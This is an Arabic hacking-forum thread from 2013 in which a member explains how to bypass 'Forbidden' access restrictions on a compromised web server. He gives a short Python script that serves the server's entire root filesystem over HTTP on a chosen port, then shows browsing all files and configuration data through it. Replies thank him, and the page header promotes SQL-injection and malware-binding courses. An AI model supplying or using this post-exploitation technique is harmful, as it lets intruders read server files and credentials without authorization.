1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] تخطي الفوربدين عن طريق فتح بورت

الموضوع في 'آمن المواقع والسيرفرات' بواسطة ABO-SAGER, بتاريخ ‏28 مايو 2013.

كاتب الموضوع : ABO-SAGER المشاهدات : 1,552 الردود : 7 ‏28 مايو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    ABO-SAGER
    rank
    Developer

    عضو منذ:
    ‏14 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    السلام عليكم ~

    كيف الحال يا أحبتي في لله
    ~

    اليوم معي شرح ان شاء الله راح يعجبكم
    ~

    اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~

    شرط
    ~

    ان يكون السيرفر قابل انك تفتح فيه بورت
    ~

    اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~

    طيب نبدأ على بركة لله
    ~

    الخطوة الأولى
    ~

    نرفع السكربت التالي بمتداد
    py ~

    كود PHP:
    #!/usr/bin/env python
    # devilzc0de.org (c) 2012
    import SimpleHTTPServer
    import SocketServer
    import os

    port 
    13123

    if __name__=='__main__':
        
    os.chdir('/')
        
    Handler SimpleHTTPServer.SimpleHTTPRequestHandler

        httpd 
    SocketServer.TCPServer((""port), Handler)

        print(
    "Now open this server on webbrowser at port : " str(port))
        print(
    "example: http://maho.com:" str(port))
        
    httpd.serve_forever()
    هنا تضع البورت المراد فتحة في السيرفر ~

    كود PHP:
    port 13123
    الأن احفظ السكربت ورفعة على السيرفر ~

    بمتداد py ولا تنسا تصرحه 0755 ~

    قم بتشغيل السكربت عن طريق الأمر ~


    كود PHP:
    python aa.py
    الأن الصفحة راح تتطول في التحميل ~

    اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا
    ~


    كود PHP:
    http://www.xxx.com:13123

    غير 13123 إلى البورت تبعك
    ~

    والنتيجة ~


    [​IMG]


    الأن تستطيع تصفح جميع ملفات السيرفر ~

    وهذا الكونفيق
    ~


    [​IMG]

    تم الشرح بوسطة ~

    ABO-SAGER ~

    ودمتم سالمين ^_^ ~

     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    ÐŖ¸ĂβØô0Ďỵ
    rankrank
    Developer

    عضو منذ:
    ‏9 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    دفـآع عن آلوطـن ..
    الإقامة:

    رد: تخطي الفوربدين عن طريق فتح بورت

    بارك الله فيك يا غالي على الطرح المميز
     


  4. غير متصل

    سـلآشـ هـكــر
    DeveloPer Plus

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    مآهو شغلك .}.!
    الإقامة:

    رد: تخطي الفوربدين عن طريق فتح بورت

    بارك الله فيك ياغالي
    )4:")4:"
     


  5. غير متصل

    ђคкคг אאא
    rankrank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: تخطي الفوربدين عن طريق فتح بورت

    السلام عليكم ورحمة الله وبركاته
    طريقة رائعة للقيام بالاتصال العكسي ولكنها لاتجدي نفعا في السيرفرات القوية فا اغلب السيرفرات تقوم بتفعيل الفيرول ووضع رولز تمنع فتح اي بورت الفوربدين مشكلة صلاحيات فاذا كانت صلاحيتك اقل من يوزر بالسيرفر فالمشكلة تكون صعبه جدا )2:"​
     


  6. غير متصل

    Масћіле
    rank
    Developer

    عضو منذ:
    ‏2 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تخطي الفوربدين عن طريق فتح بورت



    #.

    وٌعٌلَيِکمً الَسِسِسِلَامً وٌرحًمًة الَلَهّ وٌبًرکاتٌهّ

    يِعٌطِيِيِک الَعٌافُيِة ،، تٌقُبًلَ مًروٌريِ
     


  7. غير متصل

    сомαиdα
    rank
    Developer

    عضو منذ:
    ‏29 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي الفوربدين عن طريق فتح بورت

    الله يعطيك العافية والف شكر لك!:" ​
     


  8. غير متصل

    Danger-Grave
    rank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي الفوربدين عن طريق فتح بورت

    تسلم اخي:{1}:
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...